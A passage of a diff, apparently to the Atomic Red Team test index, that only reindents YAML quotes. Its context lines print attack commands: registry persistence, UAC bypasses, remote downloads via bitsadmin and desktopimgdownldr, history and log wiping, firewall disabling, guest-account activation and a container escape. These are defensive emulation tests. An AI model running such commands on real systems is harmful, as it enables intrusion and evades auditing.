 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -18689,10 +18689,10 @@ privilege-escalation:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -18788,11 +18788,11 @@ privilege-escalation:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Shell" "explorer.exe, #{binary_to_execute}" -Force
 
-'
+          '
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Winlogon Userinit Key Persistence - PowerShell
       auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -18811,11 +18811,11 @@ privilege-escalation:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
 
-'
+          '
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Winlogon Notify Key Logon Persistence - PowerShell
       auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -18837,7 +18837,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
           -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1547.013:
     technique:
@@ -19331,10 +19331,10 @@ defense-evasion:
         command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
           #{local_file}
 
-'
+          '
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Bitsadmin Download (PowerShell)
       auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -19358,10 +19358,10 @@ defense-evasion:
         command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
           #{local_file}
 
-'
+          '
         cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Persist, Download, & Execute
       auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -19399,7 +19399,7 @@ defense-evasion:
           bitsadmin.exe /complete #{bits_job_name}
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Bits download using desktopimgdownldr.exe (cmd)
       auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -19431,10 +19431,10 @@ defense-evasion:
         command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
           /eventName:desktopimgdownldr
 
-'
+          '
         cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1
 
-'
+          '
         name: command_prompt
   T1027.001:
     technique:
@@ -19524,20 +19524,20 @@ defense-evasion:
       dependencies:
       - description: 'The binary must exist on disk at specified location (#{file_to_pad})
 
-'
+          '
         prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
 
-'
+          '
         get_prereq_command: 'cp /bin/ls #{file_to_pad}
 
-'
+          '
       executor:
         command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
 
-'
+          '
         cleanup_command: 'rm #{file_to_pad}
 
-'
+          '
         name: sh
   T1542.003:
     technique:
@@ -19770,7 +19770,7 @@ defense-evasion:
           cmd.exe /c eventvwr.msc
         cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Bypass UAC using Event Viewer (PowerShell)
       auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -19792,7 +19792,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
           -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Bypass UAC using Fodhelper
       auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -19814,7 +19814,7 @@ defense-evasion:
         cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
           2>&1
 
-'
+          '
         name: command_prompt
     - name: Bypass UAC using Fodhelper - PowerShell
       auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -19837,7 +19837,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Bypass UAC using ComputerDefaults (PowerShell)
       auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -19860,7 +19860,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Bypass UAC by Mocking Trusted Directories
@@ -19908,7 +19908,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
           -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Disable UAC using reg.exe
       auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -19921,11 +19921,11 @@ defense-evasion:
         command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 0 /f
 
-'
+          '
         cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 1 /f
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Bypass UAC using SilentCleanup task
@@ -20030,7 +20030,7 @@ defense-evasion:
       description: 'Adversaries may supply CMSTP.exe with INF files infected with
         malicious commands
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -20042,24 +20042,24 @@ defense-evasion:
       dependencies:
       - description: 'INF file must exist on disk at specified location (#{inf_file_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}"
       executor:
         command: 'cmstp.exe /s #{inf_file_path}
 
-'
+          '
         name: command_prompt
     - name: CMSTP Executing UAC Bypass
       auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
       description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
         embedding them in the RunPreSetupCommandsSection of an INF file
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -20071,17 +20071,17 @@ defense-evasion:
       dependencies:
       - description: 'INF file must exist on disk at specified location (#{inf_file_uac})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}"
       executor:
         command: 'cmstp.exe /s #{inf_file_uac} /au
 
-'
+          '
         name: command_prompt
   T1574.012:
     technique:
@@ -20192,7 +20192,7 @@ defense-evasion:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -20237,7 +20237,7 @@ defense-evasion:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -20275,7 +20275,7 @@ defense-evasion:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -20359,71 +20359,71 @@ defense-evasion:
       auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
       description: 'Clears bash history via rm
 
-'
+        '
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'rm ~/.bash_history
 
-'
+          '
         name: sh
     - name: Clear Bash history (echo)
       auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
       description: 'Clears bash history via rm
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'echo "" > ~/.bash_history
 
-'
+          '
         name: sh
     - name: Clear Bash history (cat dev/null)
       auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f
       description: 'Clears bash history via cat /dev/null
 
-'
+        '
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'cat /dev/null > ~/.bash_history
 
-'
+          '
         name: sh
     - name: Clear Bash history (ln dev/null)
       auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
       description: 'Clears bash history via a symlink to /dev/null
 
-'
+        '
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'ln -sf /dev/null ~/.bash_history
 
-'
+          '
         name: sh
     - name: Clear Bash history (truncate)
       auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739
       description: 'Clears bash history via truncate
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'truncate -s0 ~/.bash_history
 
-'
+          '
         name: sh
     - name: Clear history of a bunch of shells
       auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c
       description: 'Clears the history of a bunch of different shell types by setting
         the history size to zero
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -20438,7 +20438,7 @@ defense-evasion:
       description: 'Clears the history and disable bash history logging of the current
         shell and future shell sessions
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -20458,7 +20458,7 @@ defense-evasion:
       description: 'Using a space before a command causes the command to not be logged
         in the Bash History file
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -20473,13 +20473,13 @@ defense-evasion:
         keeps the ssh client from catching a proper TTY, which is what usually gets
         logged on lastlog
 
-'
+        '
       supported_platforms:
       - linux
       dependencies:
       - description: 'Install sshpass and create user account used for excuting
 
-'
+          '
         prereq_command: |
           /usr/sbin/useradd testuser1
           echo pwd101! | passwd testuser1 --stdin
@@ -20489,35 +20489,35 @@ defense-evasion:
       executor:
         command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
 
-'
+          '
         cleanup_command: 'userdel -f testuser1
 
-'
+          '
         name: sh
     - name: Prevent Powershell History Logging
       auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
       description: 'Prevents Powershell history
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing
 
-'
+          '
         name: powershell
         cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
     - name: Clear Powershell History by Deleting History File
       auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
       description: 'Clears Powershell history
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath
 
-'
+          '
         name: powershell
   T1070.002:
     technique:
@@ -20568,7 +20568,7 @@ defense-evasion:
       auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
       description: 'Delete system and audit logs
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -20584,7 +20584,7 @@ defense-evasion:
         This technique was used by threat actor Rocke during the exploitation of Linux
         web servers.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -20595,14 +20595,14 @@ defense-evasion:
       executor:
         command: 'echo 0> /var/spool/mail/#{username}
 
-'
+          '
         name: bash
     - name: Overwrite Linux Log
       auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
       description: 'This test overwrites the specified log. This technique was used
         by threat actor Rocke during the exploitation of Linux web servers.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -20613,7 +20613,7 @@ defense-evasion:
       executor:
         command: 'echo 0> #{log_path}
 
-'
+          '
         name: bash
   T1070.001:
     technique:
@@ -20681,7 +20681,7 @@ defense-evasion:
         System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is
         now empty.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -20692,7 +20692,7 @@ defense-evasion:
       executor:
         command: 'wevtutil cl #{log_name}
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Delete System Logs Using Clear-EventLog
@@ -20721,7 +20721,7 @@ defense-evasion:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "Word.Application" | Out-Null
@@ -20731,7 +20731,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -21042,10 +21042,10 @@ defense-evasion:
       dependencies:
       - description: 'C# file must exist on disk at specified location (#{input_file})
 
-'
+          '
         prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}"
@@ -21053,10 +21053,10 @@ defense-evasion:
         command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
           #{input_file}
 
-'
+          '
         cleanup_command: 'del #{output_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Dynamic C# Compile
       auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef
@@ -21078,18 +21078,18 @@ defense-evasion:
       dependencies:
       - description: 'exe file must exist on disk at specified location (#{input_file})
 
-'
+          '
         prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe
           -OutFile #{input_file}
 
-'
+          '
       executor:
         command: 'Invoke-Expression #{input_file}
 
-'
+          '
         name: powershell
   T1218.001:
     technique:
@@ -21169,17 +21169,17 @@ defense-evasion:
       dependencies:
       - description: 'The payload must exist on disk at specified location (#{local_chm_file})
 
-'
+          '
         prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}"
       executor:
         command: 'hh.exe #{local_chm_file}
 
-'
+          '
         name: command_prompt
     - name: Compiled HTML Help Remote Payload
       auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d
@@ -21196,7 +21196,7 @@ defense-evasion:
       executor:
         command: 'hh.exe #{remote_chm_file}
 
-'
+          '
         name: command_prompt
     - name: Invoke CHM with default Shortcut Command Execution
       auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
@@ -21222,7 +21222,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
           #{chm_file_path}'
@@ -21255,7 +21255,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
           -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
@@ -21280,7 +21280,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
         name: powershell
@@ -21321,7 +21321,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
           #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -21360,7 +21360,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
           #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -21513,17 +21513,17 @@ defense-evasion:
       dependencies:
       - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}"
       executor:
         command: 'control.exe #{cpl_file_path}
 
-'
+          '
         name: command_prompt
   T1578.002:
     technique:
@@ -21854,10 +21854,10 @@ defense-evasion:
       dependencies:
       - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
 
-'
+          '
         prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -21865,7 +21865,7 @@ defense-evasion:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
-'
+          '
         name: command_prompt
   T1078.001:
     technique:
@@ -21977,16 +21977,16 @@ defense-evasion:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-'
+          '
         cleanup_command: 'net user guest /active:no
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1578.003:
@@ -22125,7 +22125,7 @@ defense-evasion:
       description: 'Rename certutil and decode a file. This is in reference to latest
         research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -22148,7 +22148,7 @@ defense-evasion:
       description: 'Use Python to decode a base64-encoded text string and echo it
         to the console
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -22164,13 +22164,13 @@ defense-evasion:
       dependencies:
       - description: 'Python must be present
 
-'
+          '
         prereq_command: 'which python3
 
-'
+          '
         get_prereq_command: 'echo "Please install Python 3"
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
@@ -22187,7 +22187,7 @@ defense-evasion:
       description: 'Use Perl to decode a base64-encoded text string and echo it to
         the console
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -22203,13 +22203,13 @@ defense-evasion:
       dependencies:
       - description: 'Perl must be present
 
-'
+          '
         prereq_command: 'which perl
 
-'
+          '
         get_prereq_command: 'echo "Please install Perl"
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
@@ -22223,7 +22223,7 @@ defense-evasion:
       description: 'Use common shell utilities to decode a base64-encoded text string
         and echo it to the console
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -22254,7 +22254,7 @@ defense-evasion:
       description: 'Use common shell utilities to decode a hex-encoded text string
         and echo it to the console
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -22270,13 +22270,13 @@ defense-evasion:
       dependencies:
       - description: 'xxd must be present
 
-'
+          '
         prereq_command: 'which xxd
 
-'
+          '
         get_prereq_command: 'echo "Please install xxd"
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
@@ -22375,24 +22375,24 @@ defense-evasion:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-'
+          '
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-'
+          '
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-'
+          '
         get_prereq_command: 'sudo systemctl start docker
 
-'
+          '
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-'
+          '
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -22400,14 +22400,14 @@ defense-evasion:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-'
+          '
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-'
+          '
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-'
+          '
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -22417,11 +22417,11 @@ defense-evasion:
           -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
           true,"tty":true,"securityContext":{"privileged":true}}]}}''
 
-'
+          '
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 
-'
+          '
   T1006:
     technique:
       id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5
@@ -22663,7 +22663,7 @@ defense-evasion:
         command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
           /section:httplogging /dontLog:true
 
-'
+          '
         cleanup_command: |
           if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
             C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
@@ -22822,10 +22822,10 @@ defense-evasion:
       executor:
         command: 'netsh advfirewall set currentprofile state off
 
-'
+          '
         cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Disable Microsoft Defender Firewall via Registry
       auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
@@ -22838,11 +22838,11 @@ defense-evasion:
         command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
           /v "EnableFirewall" /t REG_DWORD /d 0 /f
 
-'
+          '
         cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
           /v "EnableFirewall" /t REG_DWORD /d 1 /f
 
-'
+          '
         name: command_prompt
     - name: Allow SMB and RDP on Microsoft Defender Firewall
       auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
@@ -22857,7 +22857,7 @@ defense-evasion:
           netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
         cleanup_command: 'netsh advfirewall reset >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Opening ports for proxy - HARDRAIN
       auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
@@ -22916,27 +22916,27 @@ defense-evasion:
       auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a
       description: 'Stop the Uncomplicated Firewall (UFW) if installed.
 
-'
+        '
       supported_platforms:
       - linux
       dependency_executor_name: sh
       dependencies:
       - description: 'Check if ufw is installed on the machine.
 
-'
+          '
         prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
           ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
           -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
           fi \n"
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
         command: 'ufw disable
 
-'
+          '
         cleanup_command: |
           ufw enable
           ufw status verbose
@@ -22950,7 +22950,7 @@ defense-evasion:
       dependencies:
       - description: 'Check if systemctl and ufw is installed on the machine.
 
-'
+          '
         prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n*****
           systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v
           ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1;
@@ -22958,13 +22958,13 @@ defense-evasion:
           ufw inactive *****\\n\"; exit 1; fi \n"
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
         command: 'systemctl stop ufw
 
-'
+          '
         cleanup_command: |
           systemctl start ufw
           systemctl status ufw
@@ -22977,20 +22977,20 @@ defense-evasion:
       dependencies:
       - description: 'Check if ufw is installed on the machine and enabled.
 
-'
+          '
         prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
           ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
           -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
           fi \n"
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
         command: 'ufw logging off
 
-'
+          '
         cleanup_command: |
           ufw logging low
           ufw status verbose
@@ -23004,14 +23004,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if ufw is installed on the machine and enabled.
 
-'
+          '
         prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
           ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
           -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
           fi \n"
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
@@ -23025,21 +23025,21 @@ defense-evasion:
       auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
       description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
 
-'
+        '
       supported_platforms:
       - linux
       dependency_executor_name: sh
       dependencies:
       - description: 'Check if /etc/ufw/user.rules exists.
 
-'
+          '
         prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n*****
           ufw NOT installed *****\n"; exit 1; fi
 
-'
+          '
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
@@ -23048,7 +23048,7 @@ defense-evasion:
           grep "# THIS IS A COMMENT" /etc/ufw/user.rules
         cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules
 
-'
+          '
     - name: Edit UFW firewall ufw.conf file
       auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b
       description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
@@ -23059,14 +23059,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if /etc/ufw/ufw.conf exists.
 
-'
+          '
         prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw
           NOT installed *****\n"; exit 1; fi
 
-'
+          '
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
@@ -23086,14 +23086,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if /etc/ufw/sysctl.conf exists.
 
-'
+          '
         prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n*****
           ufw NOT installed *****\n"; exit 1; fi
 
-'
+          '
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
@@ -23113,14 +23113,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if /etc/default/ufw exists.
 
-'
+          '
         prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw
           NOT installed *****\n"; exit 1; fi
 
-'
+          '
         get_prereq_command: 'echo ""
 
-'
+          '
